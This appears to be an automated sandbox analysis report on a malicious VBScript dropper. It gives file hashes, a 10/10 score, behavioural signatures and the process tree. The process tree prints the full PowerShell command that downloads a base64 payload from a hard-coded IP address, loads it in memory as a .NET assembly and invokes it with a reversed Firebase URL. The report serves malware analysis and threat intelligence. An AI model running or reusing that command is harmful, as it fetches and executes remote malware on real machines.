Analysis
-
max time kernel
37s -
max time network
44s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
14-10-2022 18:13
Static task
static1
Behavioral task
behavioral1
Sample
QJSXA02HNVFDSA_002.vbs
Resource
win7-20220812-en
windows7-x64
5 signatures
150 seconds
General
-
Target
QJSXA02HNVFDSA_002.vbs
-
Size
655KB
-
MD5
b4b5d6de250942a76ddee880ee1e79e3
-
SHA1
cb510fa59d7ffe89105fccd06b987c69fc1b1481
-
SHA256
7fbc145717d92d4d062cee79cef674462553dfe681333bba48ccd32beb97260b
-
SHA512
044ed3b0da150486bd45b8484bba90ef094a2ed0ea49162115b59ad5f529633d9f277c9021882d72e2cf672e64afcaad28810170959a0c5490e5c48e97e70a6d
-
SSDEEP
768:K1TsI0Sed5dQRXaPlSWPk/LCFeu2ka+VLG0:ugZ2Jcy0
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
ps1.dropper
http://20.7.14.99/dll/dll_ink.pdf
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 3 1160 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 1160 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1160 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
WScript.exedescription pid process target process PID 1424 wrote to memory of 1160 1424 WScript.exe powershell.exe PID 1424 wrote to memory of 1160 1424 WScript.exe powershell.exe PID 1424 wrote to memory of 1160 1424 WScript.exe powershell.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\QJSXA02HNVFDSA_002.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string((New-Object Net.WebClient).DownloadString('http://20.7.14.99/dll/dll_ink.pdf'));[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('45989365f051-b5b8-e7d4-56eb-42259d7a=nekot&aidem=tla?txt.nysabjK/o/moc.topsppa.0a7e4-32r/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth'))2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/1160-55-0x0000000000000000-mapping.dmp
-
memory/1160-57-0x000007FEF3990000-0x000007FEF43B3000-memory.dmpFilesize
10.1MB
-
memory/1160-59-0x00000000027A4000-0x00000000027A7000-memory.dmpFilesize
12KB
-
memory/1160-58-0x000007FEF2E30000-0x000007FEF398D000-memory.dmpFilesize
11.4MB
-
memory/1160-60-0x000000001B700000-0x000000001B9FF000-memory.dmpFilesize
3.0MB
-
memory/1160-61-0x00000000027AB000-0x00000000027CA000-memory.dmpFilesize
124KB
-
memory/1160-62-0x00000000027A4000-0x00000000027A7000-memory.dmpFilesize
12KB
-
memory/1160-63-0x00000000027AB000-0x00000000027CA000-memory.dmpFilesize
124KB
-
memory/1424-54-0x000007FEFBD11000-0x000007FEFBD13000-memory.dmpFilesize
8KB